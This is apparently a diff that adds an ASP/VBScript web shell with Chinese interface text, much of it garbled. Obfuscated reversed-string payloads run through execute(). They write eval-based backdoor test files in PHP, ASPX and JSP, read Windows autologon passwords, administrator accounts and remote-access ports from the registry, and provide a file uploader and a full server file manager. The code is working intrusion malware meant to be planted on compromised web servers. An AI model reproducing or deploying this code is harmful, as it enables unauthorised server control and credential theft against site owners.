+execute(shisanfun("rtSrWeR = rWeRcS��gnihtoN = OSF teS��gnihtoN = redloFtseT teS��gnihtoN = tsiLeliFtseT teS��fi dnE��fi dnE��eurT,emaneliFdnR & redlof eliFeteleD.OSF��� ��>naps/<д>';xp11:ezis-tnof'=elyts naps<�� & rtSrWeR = rtSrWeR��eslE��� >tnof/<x>wolley=roloc '1'=ezis 'sgnidbew'=ecaf tnof<>naps/<д>';xp11:ezis-tnof'=elyts naps<�� & rtSrWeR = rtSrWeR��raelC.rre��nehT rre fI��eurT,emaneliFdnR & redlof eliFtxeTetaerC.OSF��� ��>naps/<��>';xp11:ezis-tnof'=elyts naps<�� = rtSrWeR��eslE��fI dnE��eurT,emaneliFdnR & redlof eliFeteleD.OSF��� ��>naps/<д>';xp11:ezis-tnof'=elyts naps<�� & rtSrWeR = rtSrWeR��eslE��� >tnof/<x>wolley=roloc '1'=ezis 'sgnidbew'=ecaf tnof<>naps/<д>';xp11:ezis-tnof'=elyts naps<�� & rtSrWeR = rtSrWeR��raelC.rre��nehT rre fI��eurT,emaneliFdnR & redlof eliFtxeTetaerC.OSF��� >tnof/<x>wolley=roloc '1'=ezis 'sgnidbew'=ecaf tnof<>naps/<��>';xp11:ezis-tnof'=elyts naps<�� = rtSrWeR��raelC.rre��nehT rre fI��txeN��tsiLeliFtseT ni A hcaE roF���pmt.�� & )won(dnoceS & )won(etuniM & )won(ruoH & )won(yaD & ��pmet\�� = emaneliFdnR��sredloFbuS.redloFtseT = tsiLeliFtseT teS��)redlof(redloFteG.OSF = redloFtseT teS��)��tcejbOmetsySeliF.gnitpircS��(tcejboetaerC.revreS = OSF teS��emaneliFdnR,rtSrWeR,tsiLeliFtseT,redloFtseT,OSF miD�� txen emuser rorre no"))
+End Function
+
+function php()
+execute(shisanfun("��>rb<>mrof/<>sosf=eci&lrUmorFnwod=tcAeht&2=etirWrevo&php.tset\��&htaptoor&��=htaPeht&��&tphp&��=lrUeht&daolpu=noitcA?=noitca tsop=dohtem 2mrof=eman mrof<��j���>rb<>mrof/<>osf=eci&lrUmorFnwod=tcAeht&2=etirWrevo&xpsa.tset\��&htaptoor&��=htaPeht&��&txpsa&��=lrUeht&daolpu=noitcA?=noitca tsop=dohtem 2mrof=eman mrof<��j���>retnec<>'02'=thgieh dt<>rt<>retnec/<>a/<>tnof/<>b/<)!�����Բ��ɾ(>b<>der=roloc 5=ezis tnof<>'ledjpa=noitcA?'=ferh a<>p<>tnof/<>retnec<>rb<>p<>rb<>rb<>p<>rb<>p<>rb<>rb<>retnec/< ;psbn&;psbn&;psbn&>emarfi/<>001=thgieh 003=htdiw xpsa.tset=crs emarfi< ;psbn&;psbn&;psbn&;psbn&>emarfi/<>001=thgieh 003=htdiw psj.tset=crs emarfi< ;psbn&;psbn&;psbn&;psbn&>emarfi/<>001=thgieh 003=htdiw php.tset=crs emarfi<>retnec<��j���oo��_��oo tseT xpsa��&)26(rhc&���&)73(rhc&��;))���efasnu���,]���w���[metI.tseuqeR(lave(etirW.esnopseR��&)73(rhc&���&)06(rhc&���&)26(rhc&���&)73(rhc&�� ���eslaf���=tseuqeRetadilav ���tpircsJ���=egaugnaL egaP @%��&)06(rhc&���etirW.))��xpsa.tset��(htappam.revres(eliFtxeTetaerC.osf���oo��_��oo tseT psJ��etirW.))��psj.tset��(htappam.revres(eliFtxeTetaerC.osf���>?)(ofniphp php?<>?'oo��_��oo' ohce PHP?<��etirW.))��php.tset��(htappam.revres(eliFtxeTetaerC.osf��))0,0(tBo(tcejbOetaerC.revreS=osf tes��txeN emuseR rorrE nO��"))
+End function
+
+On Error Resume Next
+function apjdel():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.DeleteFile(server.mappath("test.aspx")):fso.DeleteFile(server.mappath("test.php")):fso.DeleteFile(server.mappath("test.jsp")):j"ɾ�����!":End function
+
+Dim T1
+Class UPC
+  Dim D1,D2
+  Public Function Form(F)
+F=lcase(F)
+If D1.exists(F) then:Form=D1(F):else:Form="":end if
+  End Function
+
+  Public Function UA(F)
+F=lcase(F)
+If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if
+  End Function
+  Private Sub Class_Initialize
+  Dim TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName
+set D1=CreateObject(ObT(4,0))
+if Request.TotalBytes<1 then Exit Sub
+set T1 = CreateObject(ObT(6,0))
+T1.Type = 1 : T1.Mode =3 : T1.Open
+T1.Write  Request.BinaryRead(Request.TotalBytes)
+T1.Position=0 : TDa =T1.Read : DStart = 1
+DEnd = LenB(TDa)
+set D2=CreateObject(ObT(4,0))
+vbCrlf = chrB(13) & chrB(10)
+set T2 = CreateObject(ObT(6,0))
+TSt = MidB(TDa,1, InStrB(DStart,TDa,vbCrlf)-1)
+TLen = LenB (TSt)
+DStart=DStart+TLen+1
+while (DStart + 10) < DEnd
+  DIEnd = InStrB(DStart,TDa,vbCrlf & vbCrlf)+3
+  T2.Type = 1 : T2.Mode =3 : T2.Open
+  T1.Position = DStart
+  T1.CopyTo T2,DIEnd-DStart
+  T2.Position = 0 : T2.Type = 2 : T2.Charset ="gb2312"
+  TIn = T2.ReadText : T2.Close
+  DStart = InStrB(DIEnd,TDa,TSt)
+  FStart = InStr(22,TIn,"name=""",1)+6
+  FEnd = InStr(FStart,TIn,"""",1)
+  UpName = lcase(Mid (TIn,FStart,FEnd-FStart))
+  if InStr (45,TIn,"filename=""",1) > 0 then
+set TFL=new FIF
+FStart = InStr(FEnd,TIn,"filename=""",1)+10
+FEnd = InStr(FStart,TIn,"""",1)
+FStart = InStr(FEnd,TIn,"Content-Type: ",1)+14
+FEnd = InStr(FStart,TIn,vbCr)
+TFL.FileStart =DIEnd
+TFL.FileSize = DStart -DIEnd -3
+if not D2.Exists(UpName) then
+  D2.add UpName,TFL
+end if
+  else
+T2.Type =1 : T2.Mode =3 : T2.Open
+T1.Position = DIEnd : T1.CopyTo T2,DStart-DIEnd-3
+T2.Position = 0 : T2.Type = 2
+T2.Charset ="gb2312"
+SFV = T2.ReadText
+T2.Close
+if D1.Exists(UpName) then
+  D1(UpName)=D1(UpName)&", "&SFV
+else
+  D1.Add UpName,SFV
+end if
+  end if
+  DStart=DStart+TLen+1
+wend
+TDa=""
+set T2 =nothing
+  End Sub
+  Private Sub Class_Terminate
+if Request.TotalBytes>0 then
+  D1.RemoveAll:D2.RemoveAll
+  set D1=nothing:set D2=nothing
+  T1.Close:set T1 =nothing
+end if
+  End Sub
+End Class
+
+Class FIF
+dim FileSize,FileStart
+  Private Sub Class_Initialize
+  FileSize = 0
+  FileStart= 0
+  End Sub
+  Public function SaveAs(F)
+  dim T3
+  SaveAs=true
+  if trim(F)="" or FileStart=0 then exit function
+  set T3=CreateObject(ObT(6,0))
+ T3.Mode=3 : T3.Type=1 : T3.Open
+ T1.position=FileStart
+ T1.copyto T3,FileSize
+ T3.SaveToFile F,2
+ T3.Close
+ set T3=nothing
+ SaveAs=false
+end function
+End Class
+Class LBF
+  Dim CF
+  Private Sub Class_Initialize
+SET CF=CreateObject(ObT(0,0))
+  End Sub
+  Private Sub Class_Terminate
+Set CF=Nothing
+  End Sub
+Function ShowDriver()
+For Each D in CF.Drives
+  j cdx&"<a href='javascript:ShowFolder("""&D.DriveLetter&":\\"")'>&nbsp���ش��� ("&D.DriveLetter&":)</a><br></td></tr>" 
+Next
+  End Function
+Function IsIco(ia,ib,ta)
+	If ShowFileIco=true Then
+      IsIco = " <img src='"&IcoPath&ia&"'> "
+	  If ib<>"" Then
+	  IsIco = "<img src='"&IcoPath&ib&"'> "
+	  End If
+	Else
+	  IsIco = "&nbsp;<font face='wingdings' color='#dddddd' size='6'>"&ta&"</font>  "
+	End If
+End Function
+Function FileIco(FName)
+  If ShowFileIco=true Then
+    TypeList =  ".asp.asa.bat.bmp.com.doc.db.dll.exe.gif.htm.html.inc.ini.jpg.js.log.mdb.mid.mp3.png.php.rm.rar.swf.txt.wav.xls.xml.zip.jsp.aspx.;"
+    FileType = lcase(Mid(FName, InstrRev(FName,".")+1))
+    If Instr(TypeList,"."&FileType)>0 then
+      Ico = FileType&".gif"
+    Else
+      Ico = "default.gif"
+    End If
+
+    FileIco = "<img src='"&IcoPath&Ico&"' border='0'> "
+  Else 
+    FileIco="<font face='wingdings' color='#dddddd' size='3'>2</font> "
+  End If
+End Function
+Function Show1File(Path) 
+execute(shisanfun("gnihtoN=DLOF teS��fi dne:fi dne:fi dne:1+)��cevres��(noisses=)��cevres��(noisses neht ���><noitcA fi:esle:���&lruypoc&��� j:1+)��cevres��(noisses=)��cevres��(noisses:neht 1=)��cevres��(noisses fi:esle:neht  0><)��.861.291��,urevreS(rtsnI ro 0><)��1.0.0.721��,urevreS(rtsnI fi:��>elbat/<>rt/<��&IS j��txeN��1+i=i���>rt/<>dt/<��&)��-��,��/��,deifidoMtsaLetaD.L(ecalper&��>d=di dt<>dt/<>a/<evoM>'����'=eltit 'ma'=ssalc ')���eliFevoM���,����&)emaN.L&��\��&htaP(htaPeR&����(mroFlluF:tpircsavaj'=ferh a< >a/<ypoC>'�Ƹ�'=eltit 'ma'=ssalc ')���eliFypoC���,����&)emaN.L&��\��&htaP(htaPeR&����(mroFlluF:tpircsavaj'=ferh a< >a/<leD>'��ɾ'=eltit 'ma'=ssalc ')(kosey nruter'=kcilcno  ')���eliFleD���,����&)emaN.L&��\��&htaP(htaPeR&����(mroFlluF:tpircsavaj'=ferh a< ��&is=is��fi dne���̩�&is=is��esle���>tnof/<x>der=roloc '1'=ezis 'sgnidbew'=ecaf tnof<��&is=is��neht 0=KOOtidE fi��fI dnE��0=KOOtidE:1 - VOOtidE = VOOtidE��nehT 1 => VOOtidE fI��fI dnE��0=KOOtidE:2 - VOOtidE = VOOtidE��nehT 2 => VOOtidE fI��fI dnE��0=KOOtidE:4 - VOOtidE = VOOtidE��nehT 4 => VOOtidE fI��fI dnE��8 - VOOtidE = VOOtidE��nehT 8 => VOOtidE fI:fI dnE��61 - VOOtidE = VOOtidE��nehT 61 => VOOtidE fI��fI dnE��23 - VOOtidE = VOOtidE��nehT 23 => VOOtidE fI��fI dnE��46 - VOOtidE = VOOtidE��nehT 46 => VOOtidE fI��fI dnE��821 - VOOtidE = VOOtidE��nehT 821 => VOOtidE fI��setubirttA.l=VOOtidE��1=KOOtidE��KOOtidE miD���>a/<��Ȩ>00FF00#=roloc tnof<>'��Ȩ'=eltit 'ma'=ssalc '###'=ferh ���)'002=thgieh,003=htdiw,0=elbaziser,0=srabllorcs,0=rabunem,0=sutats,0=seirotcerid,0=noitacol,0=rabloot','rewoPtidE','��&)emAn.L&��\��&hTaP(htApeR&��=htaPrewoP&rewoPtidE=noitcA?'(nepo.wodniw���=kcilcno a<��&iS=iS��� >a/<tidE>'����'=eltit 'ma'=ssalc ')���eliFtidE���,����&)emaN.L&��\��&htaP(htaPeR&����(mroFlluF:tpircsavaj'=ferh a<��&is=is��� >a/<nepO>'nepO'=eltit 'ma'=ssalc ����&)emAn.L&��\��&hTaP(lrUnepo&����=ferh a<��&is=is���>d=di dT<>dt/<��&epyT.L&��>d=di dT<>dt/<K��&)4201/ezis.L(gnlc&��>d=di dT<>a/<��&emaN.L&��  >'����'=eltit ';)���eliFnwoD���,����&)emaN.L&��\��&htaP(htaPeR&����(mroFlluF:tpircsavaj'=ferh a<��&is=is��)emaN.L(ocIeliF&is=is���>���''=yalpsid.elyts.1unem���=revoesuomno 42=thgieh dt<>rt<��&IS=IS��selif.dloF ni L hcaE roF���>dt/<>dt<>dt/<>b/<deifidoM tsaL>x=di b<>s=di dt<>dt/<>b/<gnitarepO>x=di b<>s=di dt<>dt/<>b/<epyT>x=di b<>s=di dt<>dt/<>b/<eziS>x=di b<>22=thgieh s=di dt<>dt/<>b/<emaneliF>x=di b<>s=di dt<>rt<>retnec=ngila '%001'=htdiw elbat<��=IS��0=i:���=IS : ���& IS j���>elbat/<>rt/<>dt/<>2=thgieh dt<>rt<>rt/<��&IS=IS��txeN���>rt<>rt/<��&IS=IS neht 0=6 dom i fI��1+i=i���>dt/<>vid/< >a/<evoM>'����'=eltit 'ma'=ssalc ')(kosey nruter'=kcilcno ')���redloFevoM���,����&)emaN.F&��\��&htaP(htaPeR&����(mroFlluF:tpircsavaj'=ferh a< >a/<leD>'��ɾ'=eltit 'ma'=ssalc ')(kosey nruter'=kcilcno ')���redloFleD���,����&)��\\��,��\��,emaN.F&��\��&htaP(ecalpeR&����(mroFlluF:tpircsavaj'=ferh a< >a/<ypoC>'�Ƹ�'=eltit 'ma'=ssalc ')(kosey nruter'=kcilcno  ')���redloFypoC���,����&)emaN.F&��\��&htaP(htaPeR&����(mroFlluF:tpircsavaj'=ferh a<>rb<>a/<��&emaN.F&��>rb<>���������=eltit ')����&)emaN.F&��\��&htaP(htaPeR&����(redloFwohS:tpircsavaj'=ferh a<��&is=is��)��0��,��fig.redlof��,���(ocIsI&IS=IS���>'xp4:mottob-gniddap;838383# dilos xp1:redrob'=elyts vid<>retnec=ngila %71=htdiw 01=thgieh dt<��&IS=IS��sredlofbus.DLOF ni F hcaE roF�� ��>rt<>'6'=gniddapllec '0'=gnicapsllec '0'=redrob '%001'=htdiw elbat<��=IS��0=i��)htaP(redloFteG.FC=DLOF teS"))
+End function
+Function DelFile(Path)
+If CF.FileExists(Path) Then
+CF.DeleteFile Path
+SI="<center><br><br><br>��ϲ���ļ� "&Path&" ɾ���ɹ���</center>"
+SI=SI&BackUrl
+j SI
+j ""&copyurl&""
+End If
+End Function
+Function EditFile(Path)
+If Request("Action2")="Post" Then
+Set T=CF.CreateTextFile(Path)
+T.WriteLine Request.form("content")
+T.close
+Set T=nothing
+SI="<center><br><br><br>��ϲ���ļ�����ɹ���</center>"
+SI=SI&BackUrl
+j SI
+j ""&copyurl&""
+Response.End
+End If
+If Path<>"" Then
+Set T=CF.opentextfile(Path, 1, False)
+Txt=HTMLEncode(T.readall) 
+T.close
+Set T=Nothing
+Else
+Path=Session("FolderPath")&"\shell.asp":Txt=strBAD
+End If
+j "<Form action='"&URL&"?Action2=Post' method='post' name='EditForm'><input name='Action' value='EditFile' Type='hidden'><input name='FName' value='"&Path&"' style='width:100%'><br><textarea name='Content' style='width:100%;height:450'>"&Txt&"</textarea><br><hr><input name='goback' type='button' value='Back' onclick='history.back();'>&nbsp;&nbsp;&nbsp;<input name='reset' type='reset' value='Reset'>&nbsp;&nbsp;&nbsp;<input name='submit' type='submit' value='Save'></form>"
+End Function
+Function CopyFile(Path)
+Path=Split(Path,"||||")
+If CF.FileExists(Path(0)) and Path(1)<>"" Then
+CF.CopyFile Path(0),Path(1)
+SI="<center><br><br><br>��ϲ���ļ�"&Path(0)&"���Ƴɹ���</center>"
+SI=SI&BackUrl
+j SI 
+End If
+End Function
+Function MoveFile(Path)
+Path=Split(Path,"||||")
+If CF.FileExists(Path(0)) and Path(1)<>"" Then
+CF.MoveFile Path(0),Path(1)
+SI="<center><br><br><br>��ϲ���ļ�"&Path(0)&"�ƶ��ɹ���</center>"
+SI=SI&BackUrl
+j SI 
+End If
+End Function
+Function DelFolder(Path)
+If CF.FolderExists(Path) Then
+CF.DeleteFolder Path
+SI="<center><br><br><br>��ϲ��Ŀ¼"&Path&"ɾ���ɹ���</center>"
+SI=SI&BackUrl
+j SI
+End If
+End Function
+Function CopyFolder(Path)
+Path=Split(Path,"||||")
+If CF.FolderExists(Path(0)) and Path(1)<>"" Then
+CF.CopyFolder Path(0),Path(1)
+SI="<center><br><br><br>��ϲ��Ŀ¼"&Path(0)&"���Ƴɹ���</center>"
+SI=SI&BackUrl
+j SI
+End If
+End Function
+Function MoveFolder(Path)
+Path=Split(Path,"||||")
+If CF.FolderExists(Path(0)) and Path(1)<>"" Then
+CF.MoveFolder Path(0),Path(1)
+SI="<center><br><br><br>��ϲ��Ŀ¼"&Path(0)&"�ƶ��ɹ���</center>"
+SI=SI&BackUrl
+j SI
+End If
+End Function
+Function NewFolder(Path)
+If Not CF.FolderExists(Path) and Path<>"" Then:CF.CreateFolder Path:SI="<center><br><br><br>��ϲ��Ŀ¼"&Path&"�½��ɹ���</center>":SI=SI&BackUrl:j SI:j Efun&""&serveru&"&p="&serverp&"'><script>":End If
+End Function
+End Class
+execute(shisanfun("buS dnE��fi dnE�������erehwynAcp���ý��Ʋ�����¼Ŀ��Ĭ���Կ�,��������erehwynAcp_�ַ�>il<��j��nehT )��fic.��&emanrevres&��\cetnamyS\ataD noitacilppA\sresU llA\sgnitteS dnA stnemucoD\��&revirdsys(stsixEeliF.osf fI��)��emaNretupmoC\emaNretupmoC\emaNretupmoC\lortnoC\teSlortnoCtnerruC\METSYS\MLKH��(daeRgeR.hsw=emanrevres��)2,)2(redloFlaicepsteG.osF(tfel=evirdsyS��)��tcejbOmetsySeliF.gnitpircS��(tcejboetaerC.revreS=osf teS��txeN��fi dnE��fi dnE���>rb<��ľPHP��д�Ҳ�,¼ĿliaMbeW�Ҳ��Կ�,������ȨmetsySlacoL����,liamniW cigaM_���������>il<��j��nehT ��metsySlacoL��=emaNtnuoccAecivreS.ecivreSjbo fi��nehT )��liamniw��,)emaN.ecivreSjbo(esacl(rtsni fi��fi dnE��fi dnE���>rb<Ȩ����ľpsJ��ʹ�ǿ��Կ�,������ȨmetsySlacoL����,tacmoT_���������>il<��j��nehT ��metsySlacoL��=emaNtnuoccAecivreS.ecivreSjbo fi��nehT )��tacmot��,)emaN.ecivreSjbo(esacl(rtsni fi��fi dnE��fi dne��fi dnE���>rb<��ľPHP�ǿ��Կ�,metsySlacoLΪ��Ȩ����,�ڴ����ehcapA_���������>il< ��j��eslE���>rb<Ȩ���ֱ�Կ�.ehcapAΪ�����BEWǰ��>il<��j��nehT )��ehcapA��,)��ERAWTFOS_REVRES��(selbairaVrevreS.tseuqeR(rtsni fI��nehT ��metsySlacoL��=emaNtnuoccAecivreS.ecivreSjbo fi��nehT ��ehcapa��=)emaN.ecivreSjbo(esacl fi��fi dnE��fi dnE���>rb<Ȩ��߹�exe.us���ǿ��Կ�,������ȨmetsySlacoL����,װ��U-vreS_���������>il<��j��nehT ��metsySlacoL��=emaNtnuoccAecivreS.ecivreSjbo fi��nehT ��U-vreS��=emaN.ecivreSjbo fi��retupmoCjbo nI ecivreSjbo hcaE roF��txeN emuseR rorrE nO��)��ecivreS��(yarrA = retliF.retupmoCjbo��)��noitacilppA.llehS��(tcejbOetaerC.revreS = as teS��)��.//:TNniW��(tcejbOteG = retupmoCjbo teS���>rh<>rb<]��̽��_�������[��j���>rb<>rb<>rb<------------------------------------��j���>rb<��&kk&��:Ϊ����_����ǰ��>il<��j��)kh(daeRgeR.hsw=kk���tnuoC\munE\pipcT\secivreS\100teSlortnoC\METSYS\MLKH��=kh���>rb<��&lmtn&��:Ϊ����lmtN tenleT>il<��j��1=lmtN nehT ���=lmtn fi��)yekLMTN(daeRgeR.hsW=lmtn���LMTN\0.1\revreStenleT\tfosorciM\ERAWTFOS\ENIHCAM_LACOL_YEKH��=yekLMTN���>rb<��&ylpsid&��:������Ǵ�_��ʾ�Է���>il<��j�����=ylpsid esle ���ǩ�=ylpsid nehT 0=nigolpsid ro ���=nigolpsid fI��)��emaNresUtsaLyalpsiDtnoD\metsyS\seiciloP\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\ENIHCAM_LACOL_YEKH��(daeRger.hsw=nigolpsid��fi dnE���>tnof/<>rb<��&dwssaP&��:����>der=roloc tnof<>erauqs=epyt il<��j���>rb<��&nimdA&��:������>erauqs=epyt il<��j��)��drowssaPtluafeD\nogolniW\noisreVtnerruC\TN swodniW\tfosorciM\ERAWTFOS\ENIHCAM_LACOL_YEKH��(daeRgeR.hsW=dwssaP��)��emaNresUtluafeD\nogolniW\noisreVtnerruC\TN swodniW\tfosorciM\ERAWTFOS\ENIHCAM_LACOL_YEKH��(daeRgeR.hsW=nimdA���>rb<����:��Ƕ�_�Ի���>il<��j��eslE���>rb<����δ:��Ƕ�_�Ի���>il<��j��nehT ���=nigolotuA ro 0=nigolotuA fi��)nigolotuAsi(daeRgeR.hsW=nigolotuA���nogoLnimdAotuA\nogolniW\noisreVtnerruC\TN swodniW\tfosorciM\ERAWTFOS\ENIHCAM_LACOL_YEKH��=nigolotuAsi���>tnof/<>rb<��&emaNnimdA&��>der=roloc tnof<:Ϊ������Ա��&��������Ĭ>il<��j���fi dne���krowteN.tpircsW:���в�����������j��neht rre fi��txeN���>il/<>tnof/<>rb<��&emaN.nimda&�壺��Ա����ǰ��>der=roloc tnof<>il<�� j��srebmeM.puorGjbo ni nimda hcaE roF��)��puorg,srotartsinimdA/��&emaNretupmoC.Nt&��//:TNniW��(tcejbOteG=puorGjbo teS��)��krowteN.tpircsW��(tcejbOetaerc.revres=Nt teS�� txen emuser rorre no��0=seripxE.esnopseR���rotartsinimdA��=emaNnimdA nehT ���=emannimda fi��)yeKemaNnimdA(daeRgeR.hsw=emaNnimdA���emaNresUtluafeDtlA\nogolniW\noisreVtnerruC\TN swodniW\tfosorciM\ERAWTFOS\ENIHCAM_LACOL_YEKH��=yeKemaNnimdA���>rb<��&emancp&��:Ϊ����_��ǰ��>il<��j���>rb<.������ȡ_�����ީ�=emancp nehT ���=emancp fi��)yekemancp(daeRgeR.hsw=emancp���emaNretupmoC\emaNretupmoC\emaNretupmoC\lortnoC\teSlortnoCtnerruC\METSYS\MLKH��=yekemancp���>1=ezis rh<>rb<]��̽_����ͳϵ[>rb<>rb<��j��txen���>rb<��&)i(shtap&��>il<��j��)shtap(dnuobU ot )shtap(dnuobL=i roF���>rb<:���侶·_ǰ��ͳϵ��j���>rb<------------------------------------��j��)��;��,htaPtfoS(tilps=shtap���>rb<��֧:_������ɱ��ϵ����>il<��j nehT )��gnisir��,ofnihtaP(rtsni fi���>rb<��֧:_������ɱ��������>il<��j nehT )��surivitna��,ofnihtaP(rtsni fi���>rb<��֧:_������ɱ��ϵɽ�� >il<��j nehT )��vak��,ofnihtaP(rtsni fi���>rb<��֧:_������ɱlliK>il<��j nehT )��lliK��,ofnihtaP(rtsni fi���>rb<��֧:_�ƿ�erehwynAcP��������>il<��j nehT )��erehwynacp��,ofnihtaP(rtsni fi���>rb<��֧:_�����MFC>il<��j nehT )��7xmnoisufc��,ofnihtaP(rtsni fi���>rb<��֧:_��������elcarO>il<��j nehT )��elcaro��,ofnihtaP(rtsni fi���>rb<��֧:_��������LQSyM>il<��j nehT )��lqsym��,ofnihtaP(rtsni fi���>rb<��֧:_��������LQSSM>il<��j nehT )��revres lqs tfosorcim��,ofnihtaP(rtsni fi���>rb<��֧:_����avaJ>il<��j nehT )��avaj��,ofnihtaP(rtsni fi���>rb<��֧:_����lreP>il<��j nehT )��lrep��,ofnihtaP(rtsnI fi���:��֧����&����ͳϵ��j��)htaPtfoS(esacl=ofnihtaP��)��htaP��(meti.tnemnorivnE.hsW=htaPtfoS���>1=ezis rh<>rb<]��̽��_��ͳϵ[>rb<>rb<>rb<��j���>lo/<��j��fI dnE���>rb<�� & drowssaPnigoLotua & �� :���ܻ��ʵĩ�&��¼�Ƕ��ԩ�j��fI dnE���eslaF��j��raelC.rrE��nehT rrE fI��)yeKssaPnigoLotua & htaPnigoLotua(daeRgeR.Xsw = drowssaPnigoLotua���>rb<�� & emanresUnigoLotua & �� :����ͳϵ�ĩ�&��¼�Ƕ��ԩ�j��)yeKresUnigoLotua & htaPnigoLotua(daeRgeR.Xsw = emanresUnigoLotua��eslE��nehT 0 = elbanEnigoLotuAsi fI��)yeKelbanEnigoLotua & htaPnigoLotua(daeRgeR.Xsw = elbanEnigoLotuAsi���drowssaPtluafeD�� = yeKssaPnigoLotua���emaNresUtluafeD�� = yeKresUnigoLotua���nogoLnimdAotuA�� = yeKelbanEnigoLotua���\nogolniW\noisreVtnerruC\TN swodniW\tfosorciM\ERAWTFOS\ENIHCAM_LACOL_YEKH�� = htaPnigoLotua��fI dnE���>/rb<�� & troPmret & �� :�ڶ˩�&���������ǰ����j��eslE ���>/rb<.���޵��ܷ�����Ȩ��� ,�ڶ˶��յ��÷��ީ�j�� nehT 0 >< rebmuN.rrE rO ��� = troPmret fI���>lo<¼�Ƕ��Լ���&��ڶ����_���թ�j��)yeKtroPlanimret & htaPtroPlanimret(daeRgeR.Xsw = troPmret���rebmuNtroP�� = yeKtroPlanimret���\pcT-PDR\snoitatSniW\revreS lanimreT\lortnoC\teSlortnoCtnerruC\METSYS\MLKH�� = htaPtroPlanimret��drowssaPnigoLotua ,emanresUnigoLotua ,yeKelbanEnigoLotua ,elbanEnigoLotuAsi miD��yeKssaPnigoLotua ,yeKresUnigoLotua ,htaPnigoLotua miD��troPmret ,yeKtroPlanimret ,htaPtroPlanimret miD��)��llehS.tpircSW��(tcejbOetaerC.revreS = Xsw teS���------------------------------------------------------��j���>rb<��&troPWAP&��:Ϊ�ڶ�erehwynAcP>il<��j���erehwynAcpװ�����&���ǻ�����&����ȷ��.ȡ���&�巨�ީ�=troPWAP neht ���=troPWAP fI��)yeKerehwynAcp(daeRgeR.hsW=troPWAP���troPataDPIPCT\metsyS\noisreVtnerruC\erehwynAcp\cetnamyS\ERAWTFOS\ENIHCAM_LACOL_YEKH��=yeKerehwynAcp���>tnof/<>rb<��&troPmreT&��>der=roloc tnof<:Ϊ�ڶ�ecivreS lanimreT>il<��j����������revreS swodniWΪ���ǩ�&����ȷ��.ȡ����&�巨�ީ�=troPmreT nehT ���=troPmreT fI��)yeKmreT(daeRgeR.hsW=troPmreT���rebmuNtroP\pct\sdT\dwpdr\sdW\revreS lanimreT\lortnoC\teSlortnoCtnerruC\METSYS\ENIHCAM_LACOL_YEKH��=yeKmreT���>rb<��&troptnlT&��:�ک�&���tenleT>il<��j���)�����&����Ĭ(32��=tnlT nehT ���=troPtnlT fi��)yeKtenleT(daeRgeR.hsW=troPtnlT���troPtenleT\0.1\revreStenleT\tfosorciM \ERAWTFOS\ENIHCAM_LACOL_YEKH��=yektenleT���>1=ezis rh<>rb<]��̽��&��ڶ˩�&������[>rb<>rb<��j��fi dne��txeN���>rb<------------------------------------------------��j��fi dnE��fi dnE���>rb<��j��txen���,��&)j(wollaPDU j��)wollapdu(dnuoBU oT )wollapdu(dnuoBL = j rof���:Ϊ�ڶ�pdu�ĩ�&������>il<��j��eslE���>rb<��ȫ:Ϊ�ڶ�pdu�ĩ�&������>il<��j��nehT 0=)0(wollapdu ro ���=)0(wollapdu fI��)PDUlluF(daeRgeR.hsW=wollapdu��fi dnE���>rB<��j��txeN���,��&)j(wollapct j��)wollapct(dnuoBU oT )wollapct(dnuoBL = j roF���:Ϊ�ڶ�pct�ĩ�&������>il<��j��eslE���>rb<��ȫ:Ϊ�ڶ�pct�ĩ�&������>il<��j��nehT 0=)0(wollapct ro ���=)0(wollapct fI��)PCTlluF(daeRgeR.hsW=wollapct��KUE&BdpA&htap=PDUlluF��KTE&BdpA&htaP=PCTlluF���stroPdewollAPDU\��=KUE���stroPdewollAPCT\��=KTE��esle���>rb<ѡɸPI/pcTû>il<��j�� nehT 1=retlifpipctoN fi��fI dnE���>rb<������û��ȡ������SND��&����Ĭ>il<��j��eslE���>rb<��&rtsSND&��:ΪSND��&�忨��>il<��j��nehT ���><rtsSND fI��)yeKSND(daeRgeR.hsW=rtsSND���revreSemaN\��&BdpA&htaP=yeKSND��fi dnE���>rb<������û��ȡ�����޹���>il<��j��eslE��txeN���>rb<��&)j(yawetaG&��:��&j&�����>il<��j��)yawetaG(dnuobU ot )yawetaG(dnuobL=j roF��nehT )yaWetaG(yarrasi fI��)yeKyaWetaG(daergeR.hsW=yaWetaG���yawetaGtluafeD\��&BdpA&htaP=yeKyaWetaG��fi dnE���>rb<������û���&��ȡ������ַ��&���PI>il<��j��eslE��txeN���>rb<��&)j(rddAPI&��:Ϊ��&j&��ַ��&���PI>il<��j��)rddAPI(dnuobU ot )rddAPI(dnuobL=j roF��nehT ���><)0(rddaPI fI��)yeKPI(daergeR.hsW=rddaPI���sserddAPI\��&BdpA&htaP=yeKPI���\secafretnI\sretemaraP\pipcT\secivreS\100teSlortnoC\METSYS\ENIHCAM_LACOL_YEKH��=htaP���>rb<��&BdpA&��:Ϊ����ĩ�&i&�忨����j��)���,��\eciveD\��,)i(sdpA(ecalpeR=BdpA��1-)sdpA(dnuoBU oT )sdpA(dnuoBL=i roF�� nehT )sdpA(yarrAsI fI��)yeKdpA(daeRgeR.hsW=sdpA���dniB\egakniL\pipcT\secivreS\100teSlortnoC\METSYS\MLKH��=yeKdpA��fI dnE��1=retlifpipctoN��nehT ���=elbanEsi ro 0=elbanEsi fI��)yeKpipcTelbanE(daergeR.hsW=elbanEsi���sretliFytiruceSelbanE\sretemaraP\pipcT\secivreS\teSlortnoCtnerruc\METSYS\MLKH��=yeKPIPCTelbanE���>1=ezis rh<>rb<]��̽��&������[��j��)��llehS.tpircsW��(tcejboetaerc=hsw tes��hsw mid��txen emuser rorre no��)(ofnIlanimreTteg bus"))
+
+sub hiddenshell
